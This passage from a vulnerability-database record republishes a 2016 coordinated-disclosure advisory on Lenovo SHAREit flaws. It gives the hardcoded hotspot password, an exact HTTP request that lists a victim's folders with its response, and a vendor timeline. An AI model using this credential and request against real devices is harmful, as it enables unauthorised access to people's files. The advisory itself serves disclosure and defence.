",\n\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Links\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Links\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Music\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Music\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"My\nMusic\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Pictures\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Pictures\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"My\nPictures\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Saved\nGames\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Saved\nGames\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Saved\nGames\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Searches\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Searches\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Searches\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Tracing\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Tracing\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Tracing\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Videos\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Videos\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"My\n\",\"type\":\"file\",\"ver\":\"\"}],\"filepath\":\"C:\\\\Users\\\\admin\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\",\"isloaded\":true,\"isroot\":false,\"isvolume\":false,\"name\":\"admin\",\"type\":\"file\",\"ver\":\"\"}\n \n7.3. Files transferred in plain text in Windows and Android version of Lenovo SHAREit\n\n[CVE-2016-1489] The files are transfered via HTTP without encryption. \n\n7.4. Open WiFi Network defined on Android devices\n\n[CVE-2016-1492] When the application is configured to receive files, an open Wifi HotSpot is created without any password. An attacker could connect to that HotSpot and capture the information transferred between those devices. \n\n \n\n8. Report Timeline\n\n2015-10-29: Core Security sent an initial notification to Lenovo. \n2015-10-29: Lenovo replied attaching their public PGP key. \n2015-10-29: Core Security sent Lenovo a draft version of the advisory and requested a tentative day for the release of the patched version. \n2015-10-29: Lenovo replied their development team would review Core Security findings. \n2015-11-06: Lenovo informed that they would like to discuss their progress in a telephone meeting. \n2015-11-06: Core Security replied Lenovo that is our policy not to have such communications in order to always keep a log of all interactions with the vendor. \n2015-11-06: Lenovo replied they understood Core Security policy and asked if the first disclosure date was negotiable. \n2015-11-06: Core Security replied Lenovo that the date was negotiable, being the priority to make a coordinated release. \n2015-11-13: Lenovo informed Core Security they had addressed the Windows version issues and could share a beta fix for us to validate. They informed as well that the development team would continue to investigate the Android version issues. \n2015-11-20: Lenovo asked Core Security for feedback regarding their beta fix. \n2015-11-20: Core Security replied saying there was a small delay in the review of the beta fix and informed Lenovo they would send a reply next week. \n2015-11-20: Lenovo asked Core Security to confirm that the publication date of the advisory was not going to be on November 30, and asked to seek an agreement regarding a specific date. \n2015-11-23: Core Security replied stating that they were not going to publish their findings on November 30, and the idea was to coordinate a schedule according to the release date of the corrected versions. Additionally, Core Security informed Lenovo regarding the beta fix, which was still using the hardcoded password. \n2015-11-23: Lenovo informed Core Security that they had forwarded Core\u0027s analysis to their development team. \n2015-11-25: Lenovo informed Core Security that they considered that issue as resolved considering that the hardcoded password was not present in the \"secure mode\" and only used in the \"easy mode\". \n2015-12-06: Lenovo informed Core Security that they were still working on the schedule. \n2015-12-07: Lenovo informed Core Security that they were targeting to release the updated Windows version on January 10 and that they would continue working with their third party partner for the Android version release. \n2016-01-04: Core Security asked Lenovo if the publication date could be moved from Sunday 10 to Monday 11 of January. \n2016-01-04: Lenovo asked Core Security for more specific justifications for not releasing on a Sunday. \n2016-01-05: Core Security informed Lenovo that is always recommend to publish on a working day in order to give enough time to the affected users to update their products (particularly corporate users) and avoid explotations of the published flaws by malicious users on the weekend. \n2016-01-05: Lenovo informed Core Security that they agreed to publish on Monday 11 but that they hadn\u0027t planned a date for their advisory disclosure. \n2016-01-05: Core Security informed Lenovo that our advisory would be published the same day as the release of the new version. \n2015-01-05: Lenovo informed Core Security that they would publish their advisory concurrently with Core\u0027s advisory. Lenovo requested a draft version of the advisory in order to ensure consistency among publications. They asked how Core would like to be acknowledged in their advisory and offered additional publication dates in case they couldn\u0027t meet the Monday 11 deadline. \n2016-01-05: Core Security informed Lenovo that the additional publication dates ares acceptable if Core is informed with time of such changes. We informed that we would send them a draft of the advisory once it was completed and sent them the acknowledgment line as requested. \n2016-01-06: Core Security sent Lenovo the draft version of the advisory. \n2016-01-08: Lenovo informed Core Security that due they discovered additional vulnerabilities they requested to address both platform issues together. Additionaly thay requested an extension to the publication date to mid-February and a possibility to keep updating Lenovo SHAREit. \n2016-01-08: Core Security informed Lenovo that it was our first request to address all vulnerabilities in one advisory. Additinally we requested to know which vulnerabilities they were planning to address, and if those included any of the reported by us. We expressed our willingness to extend the deadline even though the maximum 3 months period we define was already over. \n2016-01-08: Lenovo informed Core Security that they intend to address al the reported vulnerabilities by us and requested confimration on extending the date of our joint disclosure to mid-February\n2016-01-08: Core Security informed Lenovo that we wanted to know exactly when each vulnerability was going to be addressed in advanced in order to agree to extend the date of our joint disclosure. \n2016-01-08: Lenovo informed Core Security that they agreed to our terms. \n2016-01-14: Lenovo informed Core Security that they were going to publish the new versions for both platforms addressing all the reported vulnerabilities on January 15 and expected to release the joint disclosure on mid-February. \n2016-01-14: Core Security informed Lenovo that is our policy to disclose our findings once the new version correcting the issues becomes available. We informed them that if that was going to happen the following day, we would be forced to publish our security advisory the following day as well. \n2016-01-15: Lenovo informed Core Security that they misunderstood our disclosure policy. They informed us that they would probably be publishing the following week and no later than January 22. \n2016-01-15: Core Security informed Lenovo that we commited to a joint security disclosure the day the software releases went live and requested an advanced notice as soon as they could. \n2016-01-19: Lenovo informed Core Security that they agreed to our request. \n2016-01-20: Core Security informed Lenovo that they would be publishing both versions on Friday 22 of January. \n2016-01-20: Core Security requested Lenovo to release the updates on Monday 25 of January as it was recommended before in order to give the affected users enough working days to download and install the new version. \n2016-01-21: Lenovo informed Core Security that they agreed to release on Monday, January 25. They also informed that they would be publishing their security advisory as well. \n2016-01-25: Advisory CORE-2016-0002 published. \n9. References\n\n[1] http://shareit.lenovo.com/#DOWNLOAD. \n[2] http://www.lenovo.com. \n\n10. About CoreLabs\n\nCoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. \n\n11. About Core Security Technologies\n\nCore Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. \n\nCore Security\u0027s software solutions build on over a decade of trusted research and leading-edge threat expertise from the company\u0027s Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. \n\n12. Disclaimer\n\nThe contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. PGP/GPG Keys\n\nThis advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-1489"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001336"
},
{
"db": "BID",
"id": "81748"
},
{
"db": "VULHUB",
"id": "VHN-90308"
},
{
"db": "VULMON",
"id": "CVE-2016-1489"
},
{
"db": "PACKETSTORM",
"id": "135378"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-1489",
"trust": 3.0
},
{
"db": "PACKETSTORM",
"id": "135378",
"trust": 1.3
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001336",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201601-635",
"trust": 0.7
},
{
"db": "BID",
"id": "81748",
"trust": 0.4
},
{
"db": "VULHUB",
"id": "VHN-90308",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2016-1489",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-90308"
},
{
"db": "VULMON",
"id": "CVE-2016-1489"
},
{
"db": "BID",
"id": "81748"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001336"
},
{
"db": "PACKETSTORM",
"id": "135378"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-635"
},
{
"db": "NVD",
"id": "CVE-2016-1489"
}
]
},
"id": "VAR-201601-0460",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-90308"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-13T23:21:09.858000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "LEN-4058",
"trust": 0.8,
"url": "https://support.lenovo.com/jp/ja/product_security/len_4058"
},
{
"title": "Lenovo SHAREit Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=59950"
},
{
"title": "The Register",
"trust": 0.2,
"url": "https://www.theregister.co.uk/2016/01/27/worlds_worst_passwords_hardcoded_into_lenovo_shareit/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-1489"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001336"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-635"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.9
},
{
"problemtype": "CWE-254",
"trust": 1.1
},
{
"problemtype": "CWE-Other",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-90308"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001336"
},
{
"db": "NVD",
"id": "CVE-2016-1489"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.0,
"url": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities"
},
{
"trust": 1.8,
"url": "https://support.lenovo.com/us/en/product_security/len_4058"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2016/jan/67"
},
{
"trust": 1.2,
"url": "http://www.securityfocus.com/archive/1/537365/100/0/threaded"
},
{
"trust": 1.2,
"url": "http://packetstormsecurity.com/files/135378/lenovo-shareit-information-disclosure-hardcoded-password.html"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1489"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-1489"
},
{
"trust": 0.3,
"url": "http://www.lenovo.com/ca/en/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/200.html"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/254.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.theregister.co.uk/2016/01/27/worlds_worst_passwords_hardcoded_into_lenovo_shareit/"
},
{
"trust": 0.1,
"url": "https://www.securityfocus.com/bid/81748"
},
{
"trust": 0.1,
"url": "http://shareit.lenovo.com/#download."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1489"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1492"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1490"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1491"
},
{
"trust": 0.1,
"url": "http://www.lenovo.com."
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-90308"
},
{
"db": "VULMON",
"id": "CVE-2016-1489"
},
{
"db": "BID",
"id": "81748"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001336"
},
{
"db": "PACKETSTORM",
"id": "135378"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-635"
},
{
"db": "NVD",
"id": "CVE-2016-1489"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-90308"
},
{
"db": "VULMON",
"id": "CVE-2016-1489"
},
{
"db": "BID",
"id": "81748"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001336"
},
{
"db": "PACKETSTORM",
"id": "135378"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-635"
},
{
"db": "NVD",
"id": "CVE-2016-1489"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-01-26T00:00:00",
"db": "VULHUB",
"id": "VHN-90308"
},
{
"date": "2016-01-26T00:00:00",
"db": "VULMON",
"id": "CVE-2016-1489"
},
{
"date": "2016-01-25T00:00:00",
"db": "BID",
"id": "81748"
},
{
"date": "2016-01-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001336"
},
{
"date": "2016-01-25T20:02:22",
"db": "PACKETSTORM",
"id": "135378"
},
{
"date": "2016-01-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201601-635"
},
{
"date": "2016-01-26T19:59:04.407000",
"db": "NVD",
"id": "CVE-2016-1489"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-90308"
},
{
"date": "2018-10-09T00:00:00",
"db": "VULMON",
"id": "CVE-2016-1489"
},
{
"date": "2016-01-25T00:00:00",
"db": "BID",
"id": "81748"
},
{
"date": "2016-01-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001336"
},
{
"date": "2016-01-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201601-635"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2016-1489"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "specific network environment",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201601-635"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Windows and Android Edition Lenovo SHAREit Vulnerability in which important information is obtained",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001336"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201601-635"
}
],
"trust": 0.6
}
}
VAR-201601-0462
Vulnerability from variot - Updated: 2025-04-13 23:21The Wifi hotspot in Lenovo SHAREit before 3.2.0 for Windows, when configured to receive files, has a hardcoded password of 12345678, which makes it easier for remote attackers to obtain access by leveraging a position within the WLAN coverage area. Lenovo ShareIT is prone to multiple security vulnerabilities. An attacker can exploit these issues to bypass certain security restrictions and gain access to sensitive information, to perform man-in-the-middle attacks and bypass authorization mechanism. Lenovo SHAREit (Eggplant Express) for Windows is a set of file sharing software based on Windows system of China Lenovo (Lenovo). There is a security vulnerability in the Wifi hotspot component of Lenovo SHAREit for Windows versions earlier than 3.2.0. A remote attacker could exploit this vulnerability using a location within WLAN coverage to gain access. 1. Advisory Information
Title: Lenovo ShareIT Multiple Vulnerabilities Advisory ID: CORE-2016-0002 Advisory URL: http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities Date published: 2016-01-25 Date of last update: 2016-01-22 Vendors contacted: Lenovo Release mode: Coordinated release
- Vulnerability Information
Class: Use of Hard-coded Password [CWE-259], Information Exposure [CWE-200], Missing Encryption of Sensitive Data [CWE-311], Missing Authorization [CWE-862] Impact: Security bypass, Information leak Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2016-1491, CVE-2016-1490, CVE-2016-1489, CVE-2016-1492
- Vulnerability Description
SHAREit [1] is a free application from Lenovo [2] that lets you easily share files and folders among smartphones, tablets, and personal computers.
- Vulnerable Packages
Lenovo SHAREit for Android 3.0.18_ww Lenovo SHAREit for Windows 2.5.1.1 Other products and versions may also be affected, but they were not tested.
- Vendor Information, Solutions and Workarounds
Lenovo released an updated version of Lenovo SHAREit for Windows and Android that fix the reported issues.
The new version of the products can be found here [1].
- Credits
This vulnerability was discovered and researched by Ivan Huertas from Core Security Consulting Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Security Advisories Team.
- Technical Description / Proof of Concept Code
7.1. Any system with a Wifi Network card could connect to that Hotspot by using that password. The password is always the same.
7.2. Remote browsing of file system on Lenovo SHAREit for Windows
[CVE-2016-1490] When the WiFi network is on and connected with the default password (12345678), the files can be browsed but not downloaded by performing an HTTP Request to the WebServer launched by Lenovo SHAREit. The following request was used to perform this action:
POST /list?type=file&path=C%3A%5CUsers\admin HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; XT1032 Build/KXB21.14-L1.40) Host: 192.168.173.1:2999 Connection: Keep-Alivek Accept-Encoding: gzip Content-Length: 0 HTTP/1.0 200 OK Content-Length: 2426
{"containers":[{"filepath":"C:\Users\admin\Contacts","has_thumbnail":false,"id":"C:\Users\admin\Contacts","isloaded":false,"isroot":false,"isvolume":false,"name":"Contacts","type":"file","ver":""},{"filepath":"C:\Users\admin\Desktop","has_thumbnail":false,"id":"C:\Users\admin\Desktop","isloaded":false,"isroot":false,"isvolume":false,"name":"Desktop","type":"file","ver":""},{"filepath":"C:\Users\admin\Documents","has_thumbnail":false,"id":"C:\Users\admin\Documents","isloaded":false,"isroot":false,"isvolume":false,"name":"Documents","type":"file","ver":""},{"filepath":"C:\Users\admin\Downloads","has_thumbnail":false,"id":"C:\Users\admin\Downloads","isloaded":false,"isroot":false,"isvolume":false,"name":"Downloads","type":"file","ver":""},{"filepath":"C:\Users\admin\Favorites","has_thumbnail":false,"id":"C:\Users\admin\Favorites","isloaded":false,"isroot":false,"isvolume":false,"name":"Favorites","type":"file","ver":""},{"filepath":"C:\Users\admin\Links", "has_thumbnail":false,"id":"C:\Users\admin\Links","isloaded":false,"isroot":false,"isvolume":false,"name":"Links","type":"file","ver":""},{"filepath":"C:\Users\admin\Music","has_thumbnail":false,"id":"C:\Users\admin\Music","isloaded":false,"isroot":false,"isvolume":false,"name":"My Music","type":"file","ver":""},{"filepath":"C:\Users\admin\Pictures","has_thumbnail":false,"id":"C:\Users\admin\Pictures","isloaded":false,"isroot":false,"isvolume":false,"name":"My Pictures","type":"file","ver":""},{"filepath":"C:\Users\admin\Saved Games","has_thumbnail":false,"id":"C:\Users\admin\Saved Games","isloaded":false,"isroot":false,"isvolume":false,"name":"Saved Games","type":"file","ver":""},{"filepath":"C:\Users\admin\Searches","has_thumbnail":false,"id":"C:\Users\admin\Searches","isloaded":false,"isroot":false,"isvolume":false,"name":"Searches","type":"file","ver":""},{"filepath":"C:\Users\admin\Tracing","has_thumbnail":false,"id":"C:\Users\admin\Tracing","isloaded":false,"isroot":false,"isvolume":false,"name":"Tracing","type":"file","ver":""},{"filepath":"C:\Users\admin\Videos","has_thumbnail":false,"id":"C:\Users\admin\Videos","isloaded":false,"isroot":false,"isvolume":false,"name":"My ","type":"file","ver":""}],"filepath":"C:\Users\admin","has_thumbnail":false,"id":"C:\Users\admin","isloaded":true,"isroot":false,"isvolume":false,"name":"admin","type":"file","ver":""}
7.3. Files transferred in plain text in Windows and Android version of Lenovo SHAREit
[CVE-2016-1489] The files are transfered via HTTP without encryption. An attacker that is able to sniff the network traffic could to view the data transferred or perform man in the middle attacks, for example by modifying the content of the transferred files.
7.4. An attacker could connect to that HotSpot and capture the information transferred between those devices.
- Report Timeline
2015-10-29: Core Security sent an initial notification to Lenovo. 2015-10-29: Lenovo replied attaching their public PGP key. 2015-10-29: Core Security sent Lenovo a draft version of the advisory and requested a tentative day for the release of the patched version. 2015-10-29: Lenovo replied their development team would review Core Security findings. 2015-11-06: Lenovo informed that they would like to discuss their progress in a telephone meeting. 2015-11-06: Core Security replied Lenovo that is our policy not to have such communications in order to always keep a log of all interactions with the vendor. 2015-11-06: Lenovo replied they understood Core Security policy and asked if the first disclosure date was negotiable. 2015-11-06: Core Security replied Lenovo that the date was negotiable, being the priority to make a coordinated release. 2015-11-13: Lenovo informed Core Security they had addressed the Windows version issues and could share a beta fix for us to validate. They informed as well that the development team would continue to investigate the Android version issues. 2015-11-20: Lenovo asked Core Security for feedback regarding their beta fix. 2015-11-20: Core Security replied saying there was a small delay in the review of the beta fix and informed Lenovo they would send a reply next week. 2015-11-20: Lenovo asked Core Security to confirm that the publication date of the advisory was not going to be on November 30, and asked to seek an agreement regarding a specific date. 2015-11-23: Core Security replied stating that they were not going to publish their findings on November 30, and the idea was to coordinate a schedule according to the release date of the corrected versions. Additionally, Core Security informed Lenovo regarding the beta fix, which was still using the hardcoded password. 2015-11-23: Lenovo informed Core Security that they had forwarded Core's analysis to their development team. 2015-11-25: Lenovo informed Core Security that they considered that issue as resolved considering that the hardcoded password was not present in the "secure mode" and only used in the "easy mode". 2015-12-06: Lenovo informed Core Security that they were still working on the schedule. 2015-12-07: Lenovo informed Core Security that they were targeting to release the updated Windows version on January 10 and that they would continue working with their third party partner for the Android version release. 2016-01-04: Core Security asked Lenovo if the publication date could be moved from Sunday 10 to Monday 11 of January. 2016-01-04: Lenovo asked Core Security for more specific justifications for not releasing on a Sunday. 2016-01-05: Core Security informed Lenovo that is always recommend to publish on a working day in order to give enough time to the affected users to update their products (particularly corporate users) and avoid explotations of the published flaws by malicious users on the weekend. 2016-01-05: Lenovo informed Core Security that they agreed to publish on Monday 11 but that they hadn't planned a date for their advisory disclosure. 2016-01-05: Core Security informed Lenovo that our advisory would be published the same day as the release of the new version. 2015-01-05: Lenovo informed Core Security that they would publish their advisory concurrently with Core's advisory. Lenovo requested a draft version of the advisory in order to ensure consistency among publications. They asked how Core would like to be acknowledged in their advisory and offered additional publication dates in case they couldn't meet the Monday 11 deadline. 2016-01-05: Core Security informed Lenovo that the additional publication dates ares acceptable if Core is informed with time of such changes. We informed that we would send them a draft of the advisory once it was completed and sent them the acknowledgment line as requested. 2016-01-06: Core Security sent Lenovo the draft version of the advisory. 2016-01-08: Lenovo informed Core Security that due they discovered additional vulnerabilities they requested to address both platform issues together. Additionaly thay requested an extension to the publication date to mid-February and a possibility to keep updating Lenovo SHAREit. 2016-01-08: Core Security informed Lenovo that it was our first request to address all vulnerabilities in one advisory. Additinally we requested to know which vulnerabilities they were planning to address, and if those included any of the reported by us. We expressed our willingness to extend the deadline even though the maximum 3 months period we define was already over. 2016-01-08: Lenovo informed Core Security that they intend to address al the reported vulnerabilities by us and requested confimration on extending the date of our joint disclosure to mid-February 2016-01-08: Core Security informed Lenovo that we wanted to know exactly when each vulnerability was going to be addressed in advanced in order to agree to extend the date of our joint disclosure. 2016-01-08: Lenovo informed Core Security that they agreed to our terms. 2016-01-14: Lenovo informed Core Security that they were going to publish the new versions for both platforms addressing all the reported vulnerabilities on January 15 and expected to release the joint disclosure on mid-February. 2016-01-14: Core Security informed Lenovo that is our policy to disclose our findings once the new version correcting the issues becomes available. We informed them that if that was going to happen the following day, we would be forced to publish our security advisory the following day as well. 2016-01-15: Lenovo informed Core Security that they misunderstood our disclosure policy. They informed us that they would probably be publishing the following week and no later than January 22. 2016-01-15: Core Security informed Lenovo that we commited to a joint security disclosure the day the software releases went live and requested an advanced notice as soon as they could. 2016-01-19: Lenovo informed Core Security that they agreed to our request. 2016-01-20: Core Security informed Lenovo that they would be publishing both versions on Friday 22 of January. 2016-01-20: Core Security requested Lenovo to release the updates on Monday 25 of January as it was recommended before in order to give the affected users enough working days to download and install the new version. 2016-01-21: Lenovo informed Core Security that they agreed to release on Monday, January 25. They also informed that they would be publishing their security advisory as well. 2016-01-25: Advisory CORE-2016-0002 published. 9. References
[1] http://shareit.lenovo.com/#DOWNLOAD. [2] http://www.lenovo.com.
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
- Disclaimer
The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201601-0462",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "shareit",
"scope": "lte",
"trust": 1.0,
"vendor": "lenovo",
"version": "2.5.1.1"
},
{
"model": "shareit",
"scope": "lt",
"trust": 0.8,
"vendor": "lenovo",
"version": "3.2.0 (windows)"
},
{
"model": "shareit",
"scope": "eq",
"trust": 0.6,
"vendor": "lenovo",
